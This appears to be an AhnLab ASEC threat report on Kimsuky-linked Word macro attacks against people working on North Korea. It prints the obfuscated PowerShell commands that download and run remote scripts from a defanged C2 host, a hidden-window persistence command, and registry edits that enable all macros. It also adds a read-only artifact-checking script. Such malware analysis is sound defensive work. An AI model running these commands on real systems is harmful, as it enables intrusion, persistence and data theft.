The ASEC analysis team has discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea, which suggests the attack is aimed at people working in that field. The filenames of the recently confirmed Word files are as follows:
| Date | Filename |
| --- | --- |
| July 18th | (Format Style) Collecting Feedback of Experts on 2022 National Liberation Day Congratulatory Speech in Advance.doc |
| July 20th | 0511_Meeting Proceeding of ***, Director of Ministry of Unification.doc |
| August 1st | Asan Symposium 2022.doc |
| August 3rd | Questionnaire (Researcher Hyeon).doc |
| August 4th | Questionnaire (President Ahn).doc |
| August 11th | (Plan) Session 6. Gyeonggi-do "Social Conversation for Peace and Unity" Promotion Plan.doc |
| August 16th | Questionnaire (Doctor Jeong).doc |
| August 17th | Discussion on Security of the Korean Peninsula and Strategy for North Korea (Mr. Kim).doc |
The Word files contain malicious VBA macro code identical to type B introduced in the AhnLab TIP report <Overall Organizational Analysis Report of 2021 Kimsuky Attack Word Files>. The overall operation flow is as follows:
The macro code in the most recently discovered file titled Discussion on Security of the Korean Peninsula and Strategy for North Korea (Mr. Kim).doc is shown below.
This macro code is a bit more obfuscated than the one covered in the previous post 'APT Attack Attempts Using Word Documents to Target Specific Individuals'. The obfuscation inserts junk substrings ('wra', 'eilsdjfe') into the cmdlet and method names and strips them again at runtime with Replace before passing the result to iex. When the macro runs, it downloads additional scripts from 'hxxp://vjdif.mypressonline[.]com/ho/ng.txt' using PowerShell.
[string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant).Doweilsdjfeng('hxxp://vjdif.mypressonline[.]com/ho/ng.txt')};$j=$f.Replace('wra','');$u=$j.Replace('eilsdjfe','nloadstri');$x=iex $u;iex $x
This script uses the following commands to collect information about the user's PC, encodes the data, saves it to %APPDATA%\Ahnalb\Ahnlab.hwp, and finally sends it to 'hxxp://vjdif.mypressonline[.]com/ho/post.php'.
| Execution Command | Collected Information |
| --- | --- |
| GetFolderPath("Recent") | Recent folder path |
| dir $env:ProgramFiles | ProgramFiles folder information |
| dir "C:\Program Files (x86)" | C:\Program Files (x86) folder information |
| systeminfo | System info |
| tasklist | List of running processes |
If a registry value named AhnlabUpdate exists under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, the script skips the information collection and immediately sends the log file. This is likely done so that keylogging data can be collected, since the same filename (Ahnlab.hwp) is reused as the log file in later keylogging attempts.
Once the data is sent, the script accesses hxxp://vjdif.mypressonline[.]com/ho/ng.down to download and run additional encoded scripts.
- Creating shortcut
The additionally downloaded file ng.down is encoded and is executed as a PowerShell background process through the Start-Job command. The script performs the following functions:
It creates a file named HncSerial.log in the C:\windows\temp folder containing PowerShell commands. It also creates a shortcut to that file in the Startup folder so that the malware keeps running after each logon.
[string]$a = {(New-Object Net.WebClient).Dokarysuntring('hxxp://vjdif.mypressonline[.]com/ho/ng.txt')};$b=$a.replace('karysun','wnloadS');$c=iex $b;iex $c
The following PowerShell command is run by the shortcut.
powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText('C:\windows\temp\HncSerial.log');iex $x}
- Changing Office security settings
The script changes the Office security settings so that macros always run, by changing the following registry values.
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\14.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\15.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\16.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\17.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\18.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\19.0\Word\Security -Name VBAWarnings -Value 1
- Keylogging
The user's keystrokes are saved to %APPDATA%\Ahnalb\Ahnlab.hwp. When the user starts their PC, the previously created shortcut runs, accesses hxxp://vjdif.mypressonline[.]com/ho/ng.txt, executes the PowerShell commands on that page, and ultimately sends the saved information to hxxp://vjdif.mypressonline[.]com/ho/post.php.
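As an added defender-side example (not code from the ASEC post), the following PowerShell script checks a host, read-only, for the artifacts described above: the VBAWarnings downgrade (value 1 is "Enable all macros"), the AhnlabUpdate Run value, the dropped HncSerial.log and Ahnlab.hwp files, and a Startup shortcut that points at the loader. The paths and value names are taken from the post; the function name and the use of $env:windir for the C:\windows folder are assumptions.

```powershell
# Added example, not from the ASEC post: read-only check for the host artifacts the
# post describes. Paths and value names come from the post; nothing is modified.
function Find-ReportedArtifacts {
    $findings = @()

    # 1. Office macro security downgraded: VBAWarnings=1 is "Enable all macros".
    #    The post lists Office versions 14.0 to 19.0, so the same range is checked.
    foreach ($ver in 14..19) {
        $key = "HKCU:\SOFTWARE\Microsoft\Office\${ver}.0\Word\Security"
        $sec = Get-ItemProperty -Path $key -Name VBAWarnings -ErrorAction SilentlyContinue
        if ($sec -and $sec.VBAWarnings -eq 1) { $findings += "VBAWarnings=1 at $key" }
    }

    # 2. Run-key value the script looks for before deciding whether to re-collect host info.
    $runKey = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    $run = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
    if ($run -and ($run.PSObject.Properties.Name -contains 'AhnlabUpdate')) {
        $findings += "Run value AhnlabUpdate present: $($run.AhnlabUpdate)"
    }

    # 3. Dropped PowerShell loader and the encoded collection/keylog file
    #    ($env:windir is assumed to be C:\windows as in the post).
    $paths = @("$env:windir\temp\HncSerial.log", "$env:APPDATA\Ahnalb\Ahnlab.hwp")
    foreach ($p in $paths) {
        if (Test-Path -LiteralPath $p) { $findings += "File present: $p" }
    }

    # 4. Startup-folder shortcuts whose command line references the loader file.
    $startup = [Environment]::GetFolderPath('Startup')
    $wsh = New-Object -ComObject WScript.Shell
    foreach ($lnk in Get-ChildItem -Path $startup -Filter '*.lnk' -ErrorAction SilentlyContinue) {
        $sc = $wsh.CreateShortcut($lnk.FullName)
        if (($sc.TargetPath + ' ' + $sc.Arguments) -match 'HncSerial\.log') {
            $findings += "Startup shortcut $($lnk.Name): $($sc.TargetPath) $($sc.Arguments)"
        }
    }
    return $findings
}

$hits = Find-ReportedArtifacts
if ($hits) { $hits | ForEach-Object { Write-Output "[!] $_" } }
else { Write-Output 'No artifacts from this report were found.' }
```

Run it in the context of the user account under investigation, since every location checked lives under HKCU or the user's profile.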
As Word files targeting individuals related to North Korea continue to be discovered, users need to take extra caution. They should refrain from opening email attachments from unknown senders and files from unknown sources. Furthermore, they should keep their Office security settings such that malicious macros in Word files are not executed automatically.
[File Detection]
Downloader/DOC.Kimsuky
Trojan/PowerShell.FileUpload
[IOC]
cbafe2d6c3b36087220fe63129a1e611 (VBA)
hxxp://vjdif.mypressonline[.]com/ho/ng.txt
hxxp://vjdif.mypressonline[.]com/ho/ng.down
hxxp://vjdif.mypressonline[.]com/ho/post.php
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Source: https://asec.ahnlab.com/en/38182/